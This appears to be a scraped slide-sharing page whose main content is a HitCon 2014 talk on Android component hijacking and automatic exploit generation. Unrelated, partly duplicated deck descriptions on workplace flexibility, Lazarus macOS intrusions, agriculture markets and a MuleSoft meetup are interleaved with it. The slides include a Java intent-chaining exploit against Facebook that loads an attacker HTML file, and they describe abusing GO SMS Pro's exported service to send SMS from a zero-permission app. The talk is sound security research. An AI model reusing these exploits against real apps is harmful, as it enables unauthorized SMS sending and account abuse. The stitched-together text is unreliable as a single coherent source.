This is my slides for HitCon'14: http://hitcon.org/2014/agenda/
Demo exploits and vulnerable apks are available at https://github.com/daoyuan14/ComponentHijackingExploit
This PPT is designed to give you a high level overview of Android as a development platform. It provide introduction to what the Android operating system is, how we got here, what makes it fundamentally different than any other platform, and how to take advantage of its uniqueness. By the end of this course, you will have a complete understanding of the entire operating system, at a high level
This PPT is designed to give you a high level overview of Android as a development platform. It provide introduction to what the Android operating system is, how we got here, what makes it fundamentally different than any other platform, and how to take advantage of its uniqueness. By the end of this course, you will have a complete understanding of the entire operating system, at a high level
Workplace Flexibility: The New Rules to Keep Your Employees HappyWilliam Wallace
A presentation delivered by my fake consulting firm Perscitus Consulting for Essentials of College Writing (215) by my team. My responsibility was the overall presentation structure, design and organization.
This was a great experiment using full bleed images with a text foreground.
I do not own any of the pictures or information and was used only for educational purposes.
People are a business’s most crucial asset and reducing staff turnover can be a way to significantly reduce your costs and improve business results.
These slides compliment the webinar "Flexible Working" if which explores how the use of flexible working can help retain your best people. It looked at:
• What flexible working is and how employment law fits in
• The benefits and pitfalls of flexible working
• Practical hints and tips to make flexible working really work
• Good practice when working at home
To access the recording please email marketing@shorebird-rpo.com or join our LinkedIn Webinar Group http://linkd.in/1acZPdh
Reading Group Presentation: Why Eve and Mallory Love AndroidMichael Rushanan
This presentation contains multiple pointers to academic research pertaining to Android and its security model. I presented these works to a weekly Security and Privacy reading group.
The academic proceeding can be found here:
www2.dcsec.uni-hannover.de/files/android/p50-fahl.pdf
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOSMITRE ATT&CK
From ATT&CKcon 4.0
By Marina Liang
"LABYRINTH CHOLLIMA is a prolific Democratic People's Republic of Korea (DPRK) nexus adversary focused on cyber espionage. They have been recently observed targeting FinTech (financial technology) companies in cryptocurrency revenue generation efforts. LABYRINTH CHOLLIMA has been associated with many high profile attacks, including the Sony Pictures Entertainment (SPE) breach, the WannaCry 2.0 global surge, and most recently, the 3CX supply chain compromise. Increasingly versed in cross-platform intrusions, LABYRINTH CHOLLIMA has been observed targeting macOS operating systems, and evolving their tactics, techniques, and tooling to keep in lockstep with the evolving security landscape.
This talk will deep dive into the interactive macOS intrusions Crowdstrike has attributed to LABYRINTH CHOLLIMA. We will delve into the adversary's macOS tradecraft, techniques to circumvent existing OS protections, and social engineering tactics, while showcasing how their mechanisms and tooling map to the MITRE ATT&CK kill chain, featuring some newly proposed MITRE techniques related to the Transparency, Consent, and Control (TCC) database."
Full project samples can be found here:
https://skydrive.live.com/?cid=bdf9cf467011e705#!/?cid=bdf9cf467011e705&sc=documents&uc=1&id=BDF9CF467011E705%21232
Workplace Flexibility: The New Rules to Keep Your Employees HappyWilliam Wallace
A presentation delivered by my fake consulting firm Perscitus Consulting for Essentials of College Writing (215) by my team. My responsibility was the overall presentation structure, design and organization.
This was a great experiment using full bleed images with a text foreground.
I do not own any of the pictures or information and was used only for educational purposes.
People are a business’s most crucial asset and reducing staff turnover can be a way to significantly reduce your costs and improve business results.
These slides compliment the webinar "Flexible Working" if which explores how the use of flexible working can help retain your best people. It looked at:
• What flexible working is and how employment law fits in
• The benefits and pitfalls of flexible working
• Practical hints and tips to make flexible working really work
• Good practice when working at home
To access the recording please email marketing@shorebird-rpo.com or join our LinkedIn Webinar Group http://linkd.in/1acZPdh
Reading Group Presentation: Why Eve and Mallory Love AndroidMichael Rushanan
This presentation contains multiple pointers to academic research pertaining to Android and its security model. I presented these works to a weekly Security and Privacy reading group.
The academic proceeding can be found here:
www2.dcsec.uni-hannover.de/files/android/p50-fahl.pdf
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOSMITRE ATT&CK
From ATT&CKcon 4.0
By Marina Liang
"LABYRINTH CHOLLIMA is a prolific Democratic People's Republic of Korea (DPRK) nexus adversary focused on cyber espionage. They have been recently observed targeting FinTech (financial technology) companies in cryptocurrency revenue generation efforts. LABYRINTH CHOLLIMA has been associated with many high profile attacks, including the Sony Pictures Entertainment (SPE) breach, the WannaCry 2.0 global surge, and most recently, the 3CX supply chain compromise. Increasingly versed in cross-platform intrusions, LABYRINTH CHOLLIMA has been observed targeting macOS operating systems, and evolving their tactics, techniques, and tooling to keep in lockstep with the evolving security landscape.
This talk will deep dive into the interactive macOS intrusions Crowdstrike has attributed to LABYRINTH CHOLLIMA. We will delve into the adversary's macOS tradecraft, techniques to circumvent existing OS protections, and social engineering tactics, while showcasing how their mechanisms and tooling map to the MITRE ATT&CK kill chain, featuring some newly proposed MITRE techniques related to the Transparency, Consent, and Control (TCC) database."
Full project samples can be found here:
https://skydrive.live.com/?cid=bdf9cf467011e705#!/?cid=bdf9cf467011e705&sc=documents&uc=1&id=BDF9CF467011E705%21232
Protecting your organization against attacks via the build systemLouis Jacomet
Organisations build software all the time, from developer machines to CI, even public pull requests.
There are security risks associated with these actions! Come discover what they are and how to mitigate them.
The build tool is about execution of modifications and thus inherently insecure. However risks can be mitigated through:
* Trusted dependencies
* Reproducibility
* Vulnerability tracking
Gradle will be used for examples
Željko je razvijalec pri podjetju INFINUM, kjer sodeluje pri razvoju različnih Android aplikacij. Na predavanju je detaljno predstavil kaj nam novega prinaša Android 5.0 kot so Material design, ART runtime, MultiDexSupport in drugo ter odgovoril na vprašanje, zakaj bo Android tudi v prihodnosti najbolj zastopljen operacijski sistem na področju mobilnih tehnologij.
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
The Android platform has been plagued by malware for the past several years. Despite all attempts to detect and mitigate malicious applications on Android, malware is still flying under our radar and getting on our devices and causing millions of users financial and data loss every year. Additionally, the malware analysis community is at a large disagreement on how Android malware should be classified. In this talk, we’ll dive into the tactics, tools and procedures used by Android malware today, including several case studies of exceptional malware samples. By analyzing real code used by malware in the wild, we’ll be able to show the advancements in Android malware from a design perspective.
Italy Agriculture Equipment Market Outlook to 2027harveenkaur52
Agriculture and Animal Care
Ken Research has an expertise in Agriculture and Animal Care sector and offer vast collection of information related to all major aspects such as Agriculture equipment, Crop Protection, Seed, Agriculture Chemical, Fertilizers, Protected Cultivators, Palm Oil, Hybrid Seed, Animal Feed additives and many more.
Our continuous study and findings in agriculture sector provide better insights to companies dealing with related product and services, government and agriculture associations, researchers and students to well understand the present and expected scenario.
Our Animal care category provides solutions on Animal Healthcare and related products and services, including, animal feed additives, vaccination
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfFlorence Consulting
Quattordicesimo Meetup di Milano, tenutosi a Milano il 23 Maggio 2024 dalle ore 17:00 alle ore 18:30 in presenza e da remoto.
Abbiamo parlato di come Axpo Italia S.p.A. ha ridotto il technical debt migrando le proprie APIs da Mule 3.9 a Mule 4.4 passando anche da on-premises a CloudHub 1.0.
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBrad Spiegel Macon GA
Brad Spiegel Macon GA’s journey exemplifies the profound impact that one individual can have on their community. Through his unwavering dedication to digital inclusion, he’s not only bridging the gap in Macon but also setting an example for others to follow.
6. Component:
The Building Block of Android Apps
• An app can have four types of components:
• They have their own entry points and can be
activated individually.
6
Activity
Broadcast
Receiver
Content
Provider
Service
App
7. Components can be Exposed
to Other Apps
• For flexible code and data sharing.
• Android (mainly) uses Manifest XML file to
define component exposure.
7
Twitter app
Tweet UI
Upload
Service
Camera app
IMAGE_CAPTURE request
Photo
Exported!
Camera
8. Components can be Exposed
to Other Apps
• The Manifest XML file of Chrome:
8
9. However, the confused deputy problem
will occur, causing component hijacking.
Because any other apps can send
requests to exported components.
9
11. Example: The Vulnerable GoSMS Pro
First reported by us on Sep 9, 2013
Let’s see how to exploit it!
11
12. Go SMS Pro and
Its Exported Component
• Very popular
– Top 1 SMS app in Google Play
– Over 75 million installs
• But its CellValidateService is exported
– In our tested versions: 4.35 and 5.23
12
15. Demo
• An attack app (with zero permission) can
exploit GO SMS Pro to send SMS messages (to
arbitrary phone no. specified by attackers).
15
Video link: http://youtu.be/CwtNCwAHSRs?t=25s
17. Exported Components
are Common in Android Apps
• Statistics of top 1K apps
17
Launcher or Sharing Activities
System broadcasts
require exported components
Developers’ mistakes
(intent-filter or provider)
19. Prior Related Work
Targeted generation
• “Android Permission Re-
Delegation Detection and
Test Case Generation”
• “Detecting Passive
Content Leaks and
Pollution in Android
Applications”
• “Automatically Exploiting
Potential Component
Leaks in Android
Applications”
Random generation
• “An Empirical Study of the
Robustness of Inter-
component
Communication in
Android”
• Intent Fuzzer (by iSec)
• Drozer (formerly Mercury)
• “IntentFuzzer: Detecting
Capability Leaks of
Android Applications”
19
20. Even an Unpublished BlackHat’14 One
20
• “Static Detection and Automatic Exploitation of Intent
Message Vulnerabilities in Android Applications”
– https://www.blackhat.com/us-14/briefings.html#static-detection-and-automatic-exploitation-of-intent-message-vulnerabilities-in-android-applications
21. However, they are far from perfect.
We argue several challenges that
need to be addressed for a robust
exploit generation technique.
21
22. Overview of Challenges in Focus
• Cross-component invocation problem
– Or the Next Intent issue
• Custom structure containment problem
– Exploits may need to contain custom structures
• Semantic constraint resolving problem
– Beyond the typical numeric or string constraints
• Pending Intent issue
– Making exploiting Intents is a bit different
22
First
pinpoi
nted
23. Illustrate with Real Vulnerable Apps
• Cross-component invocation problem
– Or the Next Intent issue
– Facebook
• Custom structure containment problem
– Exploits may need to contain custom structures
– Clean Master
• Semantic constraint resolving problem
– Beyond the typical numeric or string constraints
– Lango Messaging
• Pending Intent issue
– Making exploiting Intents is a bit different
– Lango Messaging
23
First
pinpoi
nted
26. Exploit Facebook by Takeshi Terada
• LoginActivity FacebookWebViewActivity
26
// create continuation_intent to call FacebookWebViewActivity.
Intent contIntent = new Intent();
contIntent.setClassName(FB_PKG, FB_WEBVIEW_ACTIVITY);
contIntent.putExtra("url", "file:///sdcard/attack.html");
// create intent to be sent to LoginActivity.
Intent intent = new Intent();
intent.setClassName(FB_PKG, FB_LOGIN_ACTIVITY);
intent.putExtra("login_redirect", false);
// put continuation_intent into extra data of the intent.
intent.putExtra(FB_PKG + ".continuation_intent", contIntent);
this.startActivity(intent);
27. How to Automatically Handle the
Cross-component Invocation?
• What final inputs do exported components
give to you?
– Maybe only an action, or better an extra field.
– Best: control the whole Intent.
• Which private components to select or attack?
– Find the set of valuable target components.
– Match the capabilities we have.
27
31. But UninstallAppData is defined by
Victim App
Option 1:
• Decompile the victim
app, and obtain the
source code of the
UninstallAppData
structure.
• But this is not reliable
– Imperfect to decompile
Option 2:
• Mimic the skeleton of
target structure
• “Part of source code”
– Field definition
– Interface functions
• But complicated, and
still may fail.
31
40. Even Under Brute-force Attempts
• Suppose the target uri is:
40
content://sms/121
This field can be brute forced.
But still require pre knowledge
to set up a valid data
Pre knowledge is required!
(1) Use model to pinpoint “sms”
(2) Cover the common uris, “contact”
But no guarantee
42. What is getResultCode() for?
42
Retrieve the current result code, as set by the previous receiver.
43. See how SMS is sent
43
sms.sendTextMessage(phoneNumber, null, message, sentPI,
deliveredPI);
PendingIntent sentPI = PendingIntent.getBroadcast(context, 0, new
Intent(SENT), 0);
PendingIntent deliveredPI = PendingIntent.getBroadcast(context, 0,
new Intent(DELIVERED), 0);
The intents in sentPI or deliveredPI will be broadcasted
after the invocation of sendTextMessage(),
and they contain the corresponding result codes.
44. The Rest of Exploit for Lango
• Invoke PendingIntent.send() to trigger its
broadcast, as well as setting result codes.
44
45. Conclusion
• My opinion:
45
Challenge Automatic? Note
Cross-component But not easy
Custom structure May fail
Semantic constraint Pre knowledge
Pending intent Need to handle